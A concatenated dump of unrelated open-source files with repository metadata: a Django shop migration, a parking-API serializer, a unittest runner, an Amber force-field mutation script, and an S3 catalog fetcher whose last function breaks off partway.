754717027be5b479d0aaf6b94d7fe00fabf44715
|
cee561c3f65aa793b2ce803a3ac775f811a448f8
|
/project/axf/migrations/0001_initial.py
|
30f36a422f80f101b09ec168679fa4b35ec6e7d0
|
[] |
no_license
|
PADDDog/axf
|
a8cb5ad45f8450521b3df63b6c53e88671f76a7b
|
2527dbb7914dbe657bd84f8bfb2a0efe35f99e09
|
refs/heads/master
| 2020-04-24T19:28:45.638178
| 2019-02-25T09:33:48
| 2019-02-25T09:33:48
| 172,213,325
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,081
|
py
|
# Generated by Django 2.1.4 on 2019-02-20 17:01
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Cart',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('userAccount', models.CharField(max_length=20)),
('productid', models.CharField(max_length=10)),
('productnum', models.IntegerField()),
('productprice', models.CharField(max_length=10)),
('isChose', models.BooleanField(default=True)),
('productimg', models.CharField(max_length=150)),
('productname', models.CharField(max_length=100)),
('orderid', models.CharField(default='0', max_length=20)),
('isDelete', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='Consignee',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('userAccount', models.CharField(max_length=20)),
('consigneeName', models.CharField(max_length=20)),
('consigneeTel', models.CharField(max_length=20)),
('consigneeAddr', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Defaultaddr',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('userAccount', models.CharField(max_length=20)),
('defaultaddr', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='FoodTypes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('typeid', models.CharField(max_length=10)),
('typename', models.CharField(max_length=20)),
('typesort', models.IntegerField()),
('childtypenames', models.CharField(max_length=150)),
],
),
migrations.CreateModel(
name='Goods',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('productid', models.CharField(max_length=10)),
('productimg', models.CharField(max_length=150)),
('productname', models.CharField(max_length=50)),
('productlongname', models.CharField(max_length=100)),
('isxf', models.NullBooleanField(default=False)),
('pmdesc', models.CharField(max_length=10)),
('specifics', models.CharField(max_length=20)),
('price', models.FloatField(max_length=10)),
('marketprice', models.CharField(max_length=10)),
('categoryid', models.CharField(max_length=10)),
('childcid', models.CharField(max_length=10)),
('childcidname', models.CharField(max_length=10)),
('dealerid', models.CharField(max_length=10)),
('storenums', models.IntegerField()),
('productnum', models.IntegerField()),
],
),
migrations.CreateModel(
name='MainShow',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('trackid', models.CharField(max_length=10)),
('name', models.CharField(max_length=20)),
('img', models.CharField(max_length=100)),
('categoryid', models.CharField(max_length=10)),
('brandname', models.CharField(max_length=20)),
('img1', models.CharField(max_length=100)),
('childcid1', models.CharField(max_length=10)),
('productid1', models.CharField(max_length=10)),
('longname1', models.CharField(max_length=50)),
('price1', models.CharField(max_length=10)),
('marketprice1', models.CharField(max_length=10)),
('img2', models.CharField(max_length=100)),
('childcid2', models.CharField(max_length=10)),
('productid2', models.CharField(max_length=10)),
('longname2', models.CharField(max_length=50)),
('price2', models.CharField(max_length=10)),
('marketprice2', models.CharField(max_length=10)),
('img3', models.CharField(max_length=100)),
('childcid3', models.CharField(max_length=10)),
('productid3', models.CharField(max_length=10)),
('longname3', models.CharField(max_length=50)),
('price3', models.CharField(max_length=10)),
('marketprice3', models.CharField(max_length=10)),
],
),
migrations.CreateModel(
name='Mustbuy',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('img', models.CharField(max_length=150)),
('name', models.CharField(max_length=20)),
('trackid', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Nav',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('img', models.CharField(max_length=150)),
('name', models.CharField(max_length=20)),
('trackid', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('orderid', models.CharField(max_length=20)),
('userid', models.CharField(max_length=20)),
('progress', models.IntegerField()),
],
),
migrations.CreateModel(
name='Shop',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('img', models.CharField(max_length=150)),
('name', models.CharField(max_length=20)),
('trackid', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('userAccount', models.CharField(max_length=20, unique=True)),
('userPasswd', models.CharField(max_length=20)),
('userName', models.CharField(max_length=20)),
('userPhone', models.CharField(max_length=20)),
('userAdderss', models.CharField(max_length=100)),
('userImg', models.CharField(max_length=150)),
('userRank', models.IntegerField()),
('userToken', models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name='Wheel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('img', models.CharField(max_length=150)),
('name', models.CharField(max_length=20)),
('trackid', models.CharField(max_length=20)),
],
),
]
|
[
"13580217851@163.com"
] |
13580217851@163.com
|
6b355314e228ed79113740c3ce9617049177d3e2
|
985f9c96c687412f44f54aba06c52d8e95505dcd
|
/parkings/serializers.py
|
b78a331d7b1a2768cbc016b3df1f639d2a8198e7
|
[] |
no_license
|
luke92/parkings-api-django
|
a3c485d31d4c3c365fd4ca0b1ba7d06fc22938d8
|
db6039a01de158614d4f91f166e518e0e7cb9b3b
|
refs/heads/master
| 2021-09-27T21:48:40.952424
| 2018-11-11T23:49:16
| 2018-11-11T23:49:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 435
|
py
|
from rest_framework import serializers
from .models.Parkings import Parkings
from .models.Configuration import Configuration
class ParkingsSerializer(serializers.ModelSerializer):
class Meta:
model = Parkings
fields = ("id", "tl_x", "tl_y", "br_x", "br_y", "isOccupied")
class ConfigurationSerializer(serializers.ModelSerializer):
class Meta:
model = Configuration
fields = ("key", "value")
|
[
"cristian.daniel.ortega@gmail.com"
] |
cristian.daniel.ortega@gmail.com
|
faed21171cc2de0cc838c6b5790f70c3e106d0a1
|
db1d7c6d2e2bf04609fbeef739f9ef8de730ae41
|
/python/unit_test/test_all.py
|
f260514d7c4965024c7f6621a4b4fa7acdefc3fe
|
[] |
no_license
|
mhyeagle/programming-language
|
752e42725bf03c0f35c8c84b3d710a58a90ad407
|
8d2d2a8052a8ed8b178ac1d87a23d7fc8ed3803e
|
refs/heads/master
| 2021-01-20T01:50:59.730843
| 2019-12-23T13:21:42
| 2019-12-23T13:21:42
| 83,811,026
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 750
|
py
|
#!/usr/bin/python3
import os
import sys
import unittest
home_dir = os.path.split(os.path.realpath(__file__))[0]
sys.path.append(home_dir + "/unittest")
print("home_dir", home_dir)
print(sys.path)
import class_1_test
import class_2_test
def suite():
modules_to_test = ('class_1_test',
'class_2_test')
alltests = unittest.TestSuite()
for module in map(__import__, modules_to_test):
if hasattr(module, '__list_module__'):
for module in module.__list_module__():
alltests.addTest(unittest.findTestCases(module))
else:
alltests.addTest(unittest.findTestCases(module))
return alltests
if __name__ == '__main__':
unittest.main(defaultTest = 'suite')
|
[
"tianyashuibin@163.com"
] |
tianyashuibin@163.com
|
e6d2dde3fc8bfe1534bc193ea46eac1ebcfe7639
|
47b4d76e9c87e6c45bab38e348ae12a60a60f94c
|
/Mutation_Modules/THR_MNT.py
|
fde9b14924c5c02cbf6e4b6deaea501455c28692
|
[] |
no_license
|
PietroAronica/Parasol.py
|
9bc17fd8e177e432bbc5ce4e7ee2d721341b2707
|
238abcdc2caee7bbfea6cfcdda1ca705766db204
|
refs/heads/master
| 2021-01-10T23:57:40.225140
| 2020-10-14T02:21:15
| 2020-10-14T02:21:15
| 70,791,648
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,736
|
py
|
# THR to MNT Mutation
import Frcmod_creator
import PDBHandler
import Leapy
from parmed.tools.actions import *
from parmed.amber.readparm import *
def parmed_command(vxi='VXI', lipid='No'):
bc = {}
with open('Param_files/AminoAcid/THR.param', 'r') as b:
data = b.readlines()[1:]
for line in data:
key, value = line.split()
bc[key] = float(value)
b.close()
fc = {}
with open('Param_files/AminoAcid/MNT.param', 'r') as b:
data = b.readlines()[1:]
for line in data:
key, value = line.split()
fc[key] = float(value)
b.close()
for i in range(11):
a = i*10
parm = AmberParm('Solv_{}_{}.prmtop'.format(a, 100-a))
changeLJPair(parm, ':{}@H'.format(vxi), ':{}@HH31'.format(vxi), '0', '0').execute()
change(parm, 'charge', ':{}@N'.format(vxi), bc['N']+((fc['N']-bc['N'])/10)*i).execute()
change(parm, 'charge', ':{}@H'.format(vxi), bc['H']-(bc['H']/10)*i).execute()
change(parm, 'charge', ':{}@CH3'.format(vxi), (fc['CH3']/10)*i).execute()
change(parm, 'charge', ':{}@HH31'.format(vxi), (fc['HH31']/10)*i).execute()
change(parm, 'charge', ':{}@HH32'.format(vxi), (fc['HH32']/10)*i).execute()
change(parm, 'charge', ':{}@HH33'.format(vxi), (fc['HH33']/10)*i).execute()
change(parm, 'charge', ':{}@CA'.format(vxi), bc['CA']+((fc['CA']-bc['CA'])/10)*i).execute()
change(parm, 'charge', ':{}@HA'.format(vxi), bc['HA']+((fc['HA']-bc['HA'])/10)*i).execute()
change(parm, 'charge', ':{}@CB'.format(vxi), bc['CB']+((fc['CB']-bc['CB'])/10)*i).execute()
change(parm, 'charge', ':{}@HB'.format(vxi), bc['HB']+((fc['HB']-bc['HB'])/10)*i).execute()
change(parm, 'charge', ':{}@CG2'.format(vxi), bc['CG2']+((fc['CG2']-bc['CG2'])/10)*i).execute()
change(parm, 'charge', ':{}@HG21'.format(vxi), bc['HG21']+((fc['HG21']-bc['HG21'])/10)*i).execute()
change(parm, 'charge', ':{}@HG22'.format(vxi), bc['HG22']+((fc['HG22']-bc['HG22'])/10)*i).execute()
change(parm, 'charge', ':{}@HG23'.format(vxi), bc['HG23']+((fc['HG23']-bc['HG23'])/10)*i).execute()
change(parm, 'charge', ':{}@OG1'.format(vxi), bc['OG1']+((fc['OG1']-bc['OG1'])/10)*i).execute()
change(parm, 'charge', ':{}@HG1'.format(vxi), bc['HG1']+((fc['HG1']-bc['HG1'])/10)*i).execute()
change(parm, 'charge', ':{}@C'.format(vxi), bc['C']+((fc['C']-bc['C'])/10)*i).execute()
change(parm, 'charge', ':{}@O'.format(vxi), bc['O']+((fc['O']-bc['O'])/10)*i).execute()
setOverwrite(parm).execute()
parmout(parm, 'Solv_{}_{}.prmtop'.format(a, 100-a)).execute()
def makevxi(struct, out, aa, vxi='VXI'):
struct.residue_dict[aa].set_resname(vxi)
N = struct.residue_dict[aa].atom_dict['N']
H = struct.residue_dict[aa].atom_dict['H']
pdb = open(out, 'w')
try:
pdb.write(struct.other_dict['Cryst1'].formatted())
except KeyError:
pass
for res in struct.residue_list:
for atom in res.atom_list:
if atom.get_name() == 'H' and res.get_resname() == vxi:
pdb.write(atom.formatted())
pdb.write(atom.halfway_between('CH3', N, H))
pdb.write(atom.superimposed1('HH31', H))
pdb.write(atom.superimposed2('HH32', H))
pdb.write(atom.superimposed3('HH33', H))
else:
pdb.write(atom.formatted())
try:
pdb.write(struct.other_dict[atom.get_number()].ter())
except:
pass
for oth in struct.other_dict:
try:
if oth.startswith('Conect'):
pdb.write(struct.other_dict[oth].formatted())
except:
pass
pdb.write('END\n')
def variablemake(sym='^'):
var1 = sym + '1'
var2 = sym + '2'
var3 = sym + '3'
var4 = sym + '4'
var5 = sym + '5'
var6 = sym + '6'
var7 = sym + '7'
var8 = sym + '8'
return var1, var2, var3, var4, var5, var6, var7, var8
def lib_make(ff, outputfile, vxi='VXI', var=variablemake()):
metcar = var[0]
methyd = var[1]
hydhyd = var[2]
ctrl = open('lyp.in', 'w')
ctrl.write("source %s\n"%ff)
ctrl.write("%s=loadpdb Param_files/LibPDB/THR-MNT.pdb\n"%vxi)
ctrl.write('set %s.1.1 element "N"\n'%vxi)
ctrl.write('set %s.1.2 element "H"\n'%vxi)
ctrl.write('set %s.1.3 element "C"\n'%vxi)
ctrl.write('set %s.1.4 element "H"\n'%vxi)
ctrl.write('set %s.1.5 element "H"\n'%vxi)
ctrl.write('set %s.1.6 element "H"\n'%vxi)
ctrl.write('set %s.1.7 element "C"\n'%vxi)
ctrl.write('set %s.1.8 element "H"\n'%vxi)
ctrl.write('set %s.1.9 element "C"\n'%vxi)
ctrl.write('set %s.1.10 element "H"\n'%vxi)
ctrl.write('set %s.1.11 element "C"\n'%vxi)
ctrl.write('set %s.1.12 element "H"\n'%vxi)
ctrl.write('set %s.1.13 element "H"\n'%vxi)
ctrl.write('set %s.1.14 element "H"\n'%vxi)
ctrl.write('set %s.1.15 element "O"\n'%vxi)
ctrl.write('set %s.1.16 element "H"\n'%vxi)
ctrl.write('set %s.1.17 element "C"\n'%vxi)
ctrl.write('set %s.1.18 element "O"\n'%vxi)
ctrl.write('set %s.1.1 name "N"\n'%vxi)
ctrl.write('set %s.1.2 name "H"\n'%vxi)
ctrl.write('set %s.1.3 name "CH3"\n'%vxi)
ctrl.write('set %s.1.4 name "HH31"\n'%vxi)
ctrl.write('set %s.1.5 name "HH32"\n'%vxi)
ctrl.write('set %s.1.6 name "HH33"\n'%vxi)
ctrl.write('set %s.1.7 name "CA"\n'%vxi)
ctrl.write('set %s.1.8 name "HA"\n'%vxi)
ctrl.write('set %s.1.9 name "CB"\n'%vxi)
ctrl.write('set %s.1.10 name "HB"\n'%vxi)
ctrl.write('set %s.1.11 name "CG2"\n'%vxi)
ctrl.write('set %s.1.12 name "HG21"\n'%vxi)
ctrl.write('set %s.1.13 name "HG22"\n'%vxi)
ctrl.write('set %s.1.14 name "HG23"\n'%vxi)
ctrl.write('set %s.1.15 name "OG1"\n'%vxi)
ctrl.write('set %s.1.16 name "HG1"\n'%vxi)
ctrl.write('set %s.1.17 name "C"\n'%vxi)
ctrl.write('set %s.1.18 name "O"\n'%vxi)
ctrl.write('set %s.1.1 type "N"\n'%vxi)
ctrl.write('set %s.1.2 type "%s"\n'%(vxi, hydhyd))
ctrl.write('set %s.1.3 type "%s"\n'%(vxi, metcar))
ctrl.write('set %s.1.4 type "%s"\n'%(vxi, methyd))
ctrl.write('set %s.1.5 type "%s"\n'%(vxi, methyd))
ctrl.write('set %s.1.6 type "%s"\n'%(vxi, methyd))
ctrl.write('set %s.1.7 type "CT"\n'%vxi)
ctrl.write('set %s.1.8 type "H1"\n'%vxi)
ctrl.write('set %s.1.9 type "CT"\n'%vxi)
ctrl.write('set %s.1.10 type "H1"\n'%vxi)
ctrl.write('set %s.1.11 type "CT"\n'%vxi)
ctrl.write('set %s.1.12 type "HC"\n'%vxi)
ctrl.write('set %s.1.13 type "HC"\n'%vxi)
ctrl.write('set %s.1.14 type "HC"\n'%vxi)
ctrl.write('set %s.1.15 type "OH"\n'%vxi)
ctrl.write('set %s.1.16 type "HO"\n'%vxi)
ctrl.write('set %s.1.17 type "C"\n'%vxi)
ctrl.write('set %s.1.18 type "O"\n'%vxi)
ctrl.write('bond %s.1.1 %s.1.2\n'%(vxi, vxi))
ctrl.write('bond %s.1.1 %s.1.3\n'%(vxi, vxi))
ctrl.write('bond %s.1.1 %s.1.7\n'%(vxi, vxi))
ctrl.write('bond %s.1.3 %s.1.4\n'%(vxi, vxi))
ctrl.write('bond %s.1.3 %s.1.5\n'%(vxi, vxi))
ctrl.write('bond %s.1.3 %s.1.6\n'%(vxi, vxi))
ctrl.write('bond %s.1.7 %s.1.8\n'%(vxi, vxi))
ctrl.write('bond %s.1.7 %s.1.9\n'%(vxi, vxi))
ctrl.write('bond %s.1.7 %s.1.17\n'%(vxi, vxi))
ctrl.write('bond %s.1.9 %s.1.10\n'%(vxi, vxi))
ctrl.write('bond %s.1.9 %s.1.11\n'%(vxi, vxi))
ctrl.write('bond %s.1.9 %s.1.15\n'%(vxi, vxi))
ctrl.write('bond %s.1.11 %s.1.12\n'%(vxi, vxi))
ctrl.write('bond %s.1.11 %s.1.13\n'%(vxi, vxi))
ctrl.write('bond %s.1.11 %s.1.14\n'%(vxi, vxi))
ctrl.write('bond %s.1.15 %s.1.16\n'%(vxi, vxi))
ctrl.write('bond %s.1.17 %s.1.18\n'%(vxi, vxi))
ctrl.write('set %s.1 connect0 %s.1.N\n'%(vxi, vxi))
ctrl.write('set %s.1 connect1 %s.1.C\n'%(vxi, vxi))
ctrl.write('set %s name "%s"\n'%(vxi, vxi))
ctrl.write('set %s.1 name "%s"\n'%(vxi, vxi))
ctrl.write('set %s head %s.1.N\n'%(vxi, vxi))
ctrl.write('set %s tail %s.1.C\n'%(vxi, vxi))
ctrl.write('saveoff %s %s.lib\n'%(vxi, vxi))
ctrl.write("quit\n")
ctrl.close()
Leapy.run('lyp.in', outputfile)
def all_make():
for i in range(0,110,10):
Frcmod_creator.make ('{}_{}.frcmod'.format(i, 100-i))
def cal(x, y, i):
num = x+((y-x)/10)*i
return num
def lac(x, y, i):
num = y+((x-y)/10)*i
return num
def stock_add_to_all(var=variablemake()):
metcar = var[0]
methyd = var[1]
hydhyd = var[2]
Frcmod_creator.make_hyb()
Frcmod_creator.TYPE_insert(metcar, 'C', 'sp3')
Frcmod_creator.TYPE_insert(methyd, 'H', 'sp3')
Frcmod_creator.TYPE_insert(hydhyd, 'H', 'sp3')
p = {}
with open('Param_files/Stock/Stock.param', 'r') as b:
data = b.readlines()[1:]
for line in data:
p[line.split()[0]] = []
for point in line.split()[1:]:
p[line.split()[0]].append(float(point))
b.close()
for i in range(11):
a = i*10
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), metcar, lac(p['CT'][0], p['0_C'][0], i), lac(p['CT'][1], p['0_C'][1], i))
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), methyd, lac(p['H1'][0], p['0_H'][0], i), lac(p['H1'][1], p['0_H'][1], i))
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), hydhyd, lac(p['0_H'][0], p['H'][0], i), lac(p['0_H'][1], p['H'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('N', metcar), lac(p['CT_N2'][0], p['CT_mN'][0], i), lac(p['CT_N2'][1], p['CT_mN'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('N', hydhyd), lac(p['HC_sCN'][0], p['NA_H'][0], i), lac(p['HC_sCN'][1], p['NA_H'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format(metcar, methyd), lac(p['CT_HC'][0], p['HC_mCTN'][0], i), lac(p['CT_HC'][1], p['HC_mCTN'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('N', metcar, methyd), lac(p['C_C_H'][0], p['Dritt'][0], i), lac(p['C_C_H'][1], p['Dritt'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(methyd, metcar, methyd), lac(p['H_C_H'][0], p['Close'][0], i), lac(p['H_C_H'][1], p['Close'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('C', 'N', metcar), lac(p['C_N_CT'][0], p['C_C_H'][0], i), lac(p['C_N_CT'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('C', 'N', hydhyd), lac(p['C_N_CT'][0], p['C_C_H'][0], i), lac(p['C_N_CT'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'N', metcar), lac(p['CT_N_CT'][0], p['C_C_H'][0], i), lac(p['CT_N_CT'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'N', hydhyd), lac(p['CT_N_CT'][0], p['C_C_H'][0], i), lac(p['CT_N_CT'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(hydhyd, 'N ', metcar), lac(p['Close'][0], p['Close'][0], i), lac(p['Close'][1], p['Close'][1], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('C ', 'N ', metcar, methyd), lac(p['X_CT_N_X'][0], p['X_CT_N_X'][0], i), lac(p['X_CT_N_X'][1], p['X_CT_N_X'][1], i), lac(p['X_CT_N_X'][2], p['X_CT_N_X'][2], i), lac(p['X_CT_N_X'][3], p['X_CT_N_X'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', 'N ', metcar, methyd), lac(p['X_CT_N_X'][0], p['X_CT_N_X'][0], i), lac(p['X_CT_N_X'][1], p['X_CT_N_X'][1], i), lac(p['X_CT_N_X'][2], p['X_CT_N_X'][2], i), lac(p['X_CT_N_X'][3], p['X_CT_N_X'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(hydhyd, 'N ', metcar, methyd), lac(p['0_Dihe'][0], p['0_Dihe'][0], i), lac(p['0_Dihe'][1], p['0_Dihe'][1], i), lac(p['0_Dihe'][2], p['0_Dihe'][2], i), lac(p['0_Dihe'][3], p['0_Dihe'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), metcar, lac(p['CT'][2], p['0_C'][2], i), lac(p['CT'][3], p['0_C'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), methyd, lac(p['HC'][2], p['0_H'][2], i), lac(p['HC'][3], p['0_H'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), hydhyd, lac(p['0_H'][2], p['HP'][2], i), lac(p['0_H'][3], p['HP'][3], i))
|
[
"pietro.ga.aronica@gmail.com"
] |
pietro.ga.aronica@gmail.com
|
5a3dde463182d1a912e6f240e481d7a62cb4f6b6
|
455d651b7362100718c0e516f37b85fea4b2c38e
|
/parser/digitalsmith_fetcher_modified.py
|
dd774c9b5076cfe24bcff19e562175e316e732f9
|
[] |
no_license
|
jsahuroot/catalogue
|
a5215c985857ea390e521d5be6e997fe1a30b66e
|
7638e9ef2f88900877085b3e1b04908a7db8a2be
|
refs/heads/master
| 2023-03-02T21:11:12.020454
| 2021-02-03T09:13:02
| 2021-02-03T09:13:02
| 323,800,025
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,271
|
py
|
#!/usr/bin/env python
import os
import json
import jsonschema
import time
import sys
from vtv_utils import make_dir_list, remove_dir_files, copy_file_list, copy_file, move_file_forcefully, vtv_send_html_mail_2
from vtv_task import VtvTask, vtv_task_main
from s3_utils import download_s3_file, get_s3_file_by_wildcard
class DigitalSmithFetchException(Exception):
def __init__(self, msg):
self.msg = msg
class DigitalSmithFetcher(VtvTask):
''' The fetcher '''
def __init__(self):
''' '''
VtvTask.__init__(self)
self.config = self.load_config()
process_dir = self.config["process_dir"]
self.PROCESS_DIR = os.path.join(self.system_dirs.VTV_DATAGEN_DIR, process_dir)
self.DATA_DIR = os.path.join(self.PROCESS_DIR, self.config["data_dir"])
self.REPORTS_DIR = os.path.join(self.system_dirs.VTV_REPORTS_DIR, process_dir)
if os.path.exists(self.DATA_DIR):
remove_dir_files(self.DATA_DIR, self.logger)
create_list = [self.PROCESS_DIR, self.DATA_DIR, self.REPORTS_DIR]
make_dir_list(create_list, self.logger)
self.options.report_file_name = os.path.join(self.REPORTS_DIR, '%s.html' % self.name_prefix)
self.tgzs_to_keep = 1
self.tar_file_prefix = self.config['tar_file_prefix']
self.s3path = ''
self.available_ids_path = ''
self.tar_files = []
self.file_name = self.config["input_catalog"]
self.available_ids_file = self.config["available_ids"]
aux_info = {
"PATH": "s3://ds-veveo-voice/vodafone/pt-staging/datagen/nlu_catalogs/catalog-*.gz",
"AVAILABLE_IDS_PATH": "s3://ds-veveo-voice/vodafone/pt-staging/datagen/nlu_catalogs/available_ids-*.data",
"APPLICATIONS_PATH": "s3://vodafone-voice-digitalsmiths.net/stage/pt-PT/datagen/navigation_data/navigation_targets_*",
"SETTINGS_PATH": "s3://vodafone-voice-digitalsmiths.net/stage/pt-PT/datagen/settings_data/settings_*"
}
'''
aux_info = {
"PATH": "s3://vodafone-voice-digitalsmiths.net/stage/de-DE/datagen/catalogs/catalog-*.gz",
"APPLICATIONS_PATH": "s3://vodafone-voice-digitalsmiths.net/stage/de-DE/datagen/navigation_data/navigation_targets_*",
"SETTINGS_PATH": "s3://vodafone-voice-digitalsmiths.net/stage/de-DE/datagen/settings_data/settings_*"
}
aux_info = {
"PATH": "s3://ds-veveo-voice/vodafone/de-staging/datagen/nlu_catalogs/catalog-*.gz",
"AVAILABLE_IDS_PATH": "s3://ds-veveo-voice/vodafone/de-staging/datagen/nlu_catalogs/available_ids-*.data",
"APPLICATIONS_PATH": "s3://vodafone-voice-digitalsmiths.net/stage/de-DE/datagen/navigation_data/navigation_targets_*",
"SETTINGS_PATH": "s3://vodafone-voice-digitalsmiths.net/stage/de-DE/datagen/settings_data/settings_*"
}
aux_info = {
"PATH": "s3://ds-veveo-voice/vodafone/de-staging/datagen/nlu_catalogs/catalog-*.gz",
"AVAILABLE_IDS_PATH": "s3://ds-veveo-voice/vodafone/de-staging/datagen/nlu_catalogs/available_ids-*.data",
"APPLICATIONS_PATH": "s3://ds-veveo-voice/vodafone/de-staging/datagen/navigation_targets_*",
"SETTINGS_PATH": "s3://ds-veveo-voice/vodafone/de-staging/datagen/settings_*"
}
'''
#if 'AUX_INFO' in os.environ:
if aux_info is not None:
#aux_info = eval(os.environ['AUX_INFO'])
self.s3path = aux_info.get('PATH', '')
self.available_ids_path = aux_info.get('AVAILABLE_IDS_PATH', '')
self.channel_s3path = aux_info.get('CHANNELS_PATH', '')
if self.channel_s3path != '':
self.channel_file_name = self.config["input_channel_file"]
self.is_validate = self.config["VALIDATION_FLAG"]
if self.is_validate:
self.email_recipiants = self.config["EMAIL_LIST"]
self.sending_mail_retries = self.config["MAIL_RETRIES"]
self.sender = self.config["SENDER"]
self.server = self.config["SERVER"]
self.channel_schema_file = self.config["CHANNEL_SCHEMA_FILE"]
def load_config(self):
''' Load config '''
config = {}
with open(self.options.config_file) as json_file:
config = json.load(json_file)
return config
def download_data(self):
status, filenames = get_s3_file_by_wildcard(self.s3path, self.logger)
if filenames:
if status:
self.logger.error("Failed to find files in %s" %self.s3path)
raise DigitalSmithFetchException("Failed to find files in %s" %self.s3path)
filenames.sort()
file_name = filenames[-1]
status, path = download_s3_file(file_name, self.PROCESS_DIR, self.logger)
if status:
self.logger.error("Failed to download file %s" %file_name)
raise DigitalSmithFetchException("Failed to download file %s" %file_name)
new_path = path.replace(os.path.basename(path),self.file_name)
self.logger.info("Decompressing %s into %s", path, new_path)
cmd = 'gzip -dv --stdout {gz_file} > {outfile}'
self.start_process(
"decompress_%s" % path,
cmd.format(gz_file=path, outfile=new_path)
)
copy_file_list([new_path], self.DATA_DIR, self.logger)
self.tar_files.append(os.path.basename(new_path))
else:
raise DigitalSmithFetchException("No files in %s" %self.s3path)
def download_available_id_data(self):
status, filenames = get_s3_file_by_wildcard(self.available_ids_path, self.logger)
if filenames:
if status:
self.logger.error("Failed to find files in %s" %self.available_ids_path)
raise DigitalSmithFetchException("Failed to find files in %s" %self.available_ids_path)
filenames.sort()
file_name = filenames[-1]
status, path = download_s3_file(file_name, self.PROCESS_DIR, self.logger)
if status:
self.logger.error("Failed to download file %s" %file_name)
raise DigitalSmithFetchException("Failed to download file %s" %file_name)
new_path = os.path.join(self.PROCESS_DIR, self.available_ids_file)
os.rename(path, new_path)
copy_file_list([new_path], self.DATA_DIR, self.logger)
else:
raise DigitalSmithFetchException("No files in %s" %self.available_ids_path)
def download_channels_data(self):
status, filenames = get_s3_file_by_wildcard(self.channel_s3path, self.logger)
if filenames:
if status:
self.logger.error("Failed to find files in %s" %self.channel_s3path)
raise DigitalSmithFetchException("Failed to find files in %s" %self.channel_s3path)
filenames.sort()
file_name = filenames[-1]
status, path = download_s3_file(file_name, self.PROCESS_DIR, self.logger)
if status:
self.logger.error("Failed to download file %s" %file_name)
raise DigitalSmithFetchException("Failed to download file %s" %file_name)
new_path = path.replace(os.path.basename(path),self.channel_file_name)
self.logger.info("Moving %s into %s", path, new_path)
move_file_forcefully(path, new_path)
copy_file_list([new_path], self.DATA_DIR, self.logger)
self.tar_files.append(os.path.basename(new_path))
if self.is_validate:
self.validate_schema(new_path, file_name, self.email_recipiants)
else:
raise DigitalSmithFetchException("No files in %s" %self.channel_s3path)
def validate_schema(self, filename, s3path, email_list):
if not self.is_validate:
return
file_name = os.path.basename(filename)
schema_file = self.channel_schema_file
self.logger.info('Validating file %s ' % filename)
self.logger.info('Schema file %s ' % schema_file)
schema=open(schema_file).read()
json_schema = json.loads(schema)
self.logger.info('Validating file %s ' % filename)
error = ''
try:
fp = open(filename, 'rb')
for line in fp:
line = line.decode('utf-8').strip()
if not line:
continue
